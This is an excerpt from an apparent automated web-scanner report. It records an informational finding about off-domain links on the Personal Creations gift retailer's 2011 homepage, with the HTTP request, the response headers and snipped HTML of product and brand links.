life...s special occasions." border="0" href="http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:177px;"><img class="footerLogo_PCR" height="35px" width="177px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a>
<a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:83px;"><img class="footerLogo_SHB" height=35px width=83px class="footerLogo_SHB" height="35px" width="83px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
<div class="OtherBrands XSmallSize">
           Other Liberty Media Brands and Services:
           <a id="_ctl11__ctl0_FooterLink_berries" href="http://www.berries.com/">Hand-Dipped Strawberries</a>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<br/><a class="Underlined" onclick="" href="http://www.facebook.com/personalcreations">Personal Creations Facebook</a><br/><a class="Underlined" onclick="" href="http://twitter.com/pcgifts">Personal Creations Twitter</a><br/><a class="Underlined" onclick="" href="http://www.linkedin.com/company/personal-creations">Personal Creations Linked-In</a>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...

18.26. http://www.personalcreations.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=iejxl5kagemrnvrodr0p4dsq; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=iejxl5kagemrnvrodr0p4dsq; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-2,trm-2,xtc-1,ttb-3,nte-1,ntc-1,ntb-1,xta-1,trf-1,tpp-3,tbc-1,ntd-1,tvc-2,tmm-2,xtb-1,tnp-2,tpf-1; domain=.personalcreations.com; expires=Thu, 04-Oct-2012 00:48:33 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txc-1,tkt-1,thp-1,txb-2,tks-1,tms-1,mpsmediapersonalitysplit-1; domain=.personalcreations.com; expires=Sun, 04-Sep-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=9/3/2011 5:48:33 PM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=15; domain=.personalcreations.com; expires=Wed, 07-Sep-2011 00:48:33 GMT; path=/
Set-Cookie: PCR_BrowserId=4e657082-fa51-47cf-a387-47adad8a3cd1; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:48:34 GMT
Content-Length: 167245


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_default.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_dynamicnavbarstyles.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_lockdown.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<li id="proFlowerLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
="nofollow" href="http://www.personalcreations.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
="nofollow" href="http://www.personalcreations.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>


<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/favicon.ico"/>

<div id="Header">
...[SNIP]...
ersonal Creations Homepage" href="http://www.personalcreations.com/sitemap.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:78px;width:212px;"><img height="78px" width="212px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Personal Creations Homepage" border="0" /></a>
...[SNIP]...
<li><a rel="nofollow" class="HeaderLink" href="https://accounts.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=PCR">Your Account</a>
...[SNIP]...
<li><a rel="nofollow" class="HeaderLink" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=PCR">Order Tracking</a>
...[SNIP]...
_ctl9__ctl8_lkCart" class="SecondaryColor HeaderLink" href="http://gifts.personalcreations.com/ShoppingCart.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme"><img style="border:0 none;" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Shopping Cart" />&nbsp;&nbsp;shopping cart&nbsp;0</a>
...[SNIP]...
<div class="headerTextMsg"> <img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PC_FreePersTest_186x47_HeaderMsg.gif" border="0" /> </div>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<a href="javascript:O_LC();"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/berries/siteimages/SiteFeedback_sm.gif" border="0" width="9" height="9" style="margin-top:-1px;vertical-align:middle;" title="site feedback" /></a>
       </div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
f="http://www.personalcreations.com/ProductSearch.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:21px;width:41px;display:inline;float:left;"><img class="sch_smallGo" height="21px" width="41px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="heroElements">
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
" href="http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_hero1" target="_self"><img id="_ctl10_DHero_rptSlides__ctl0_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_HAL11_SIT_04.jpg" alt="Shop Bestselling Halloween Gifts" border="0" /></a>
...[SNIP]...
" href="http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_hero2" target="_self"><img id="_ctl10_DHero_rptSlides__ctl1_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_CHR11_SIT_01.jpg" alt="Shop Bestselling Christmas Gifts" border="0" /></a>
...[SNIP]...
f="http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_hero3" target="_self"><img id="_ctl10_DHero_rptSlides__ctl2_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_B2S11_SIT_04.jpg" alt="Shop Bestselling Back to School Gifts" border="0" /></a>
...[SNIP]...
"0" href="http://www.personalcreations.com/personalized-wedding-gifts-PWEDBSL?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_hero4" target="_self"><img id="_ctl10_DHero_rptSlides__ctl3_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_WED11_SIT_03.jpg" alt="Shop Bestselling Wedding Gifts" border="0" /></a>
...[SNIP]...
border="0" href="http://www.personalcreations.com/clearance-sale-PCLEARA?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_topHeroPod" target="_self"><img id="_ctl10_TopPodImage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_TIL_193x154_SAL11_SIT_02.gif" alt="Shop Our Clearance Sale" border="0" style="height:154px;width:193px;" /></a>
...[SNIP]...
order="0" href="http://www.personalcreations.com/new-products-PNEWPRD?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;tile=hmpg_bottomHeroPod" target="_self"><img id="_ctl10_BottomPodImage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_TIL_193x154_ALL11_SIT_02.jpg" alt="Shop New Gifts" border="0" style="height:154px;width:193px;" /></a>
...[SNIP]...
owers/Dancing-Ghost-Figurine-30055810?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=1&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Dancing Ghost Figurine" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ons.com/gifts/Small-Pumpkins-30020318?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=2&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Small Pumpkins" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
/Halloween-Character-Doormat-30028425?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=3&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Halloween Character Doormat" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
en-Baskets---FREE-Safety-Kit-30056233?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=4&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Leggy Halloween Baskets + FREE Safety Kit" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
.com//House-of-Horrors-Slate-30030176?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=5&amp;trackingpgroup=PHMPG01" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="House of Horrors Slate" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ns.com/gifts/Ornament-Canvas-30021167?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=1&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Ornament Canvas" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
/gifts/Needlepoint-Stockings-30019422?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=2&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Vintage Handcrafted Needlepoint Stockings" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_9.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
s/Snowman-and-Cardinal-Slate-30021291?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=3&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Snowman and Cardinal Slate" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_9.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
/Winter-Wonderland-Stockings-30054670?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=4&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Winter Wonderland Stockings" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ts/Snowman-Cardinal-Doormats-30019054?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=5&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Snowman Cardinal Doormats" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
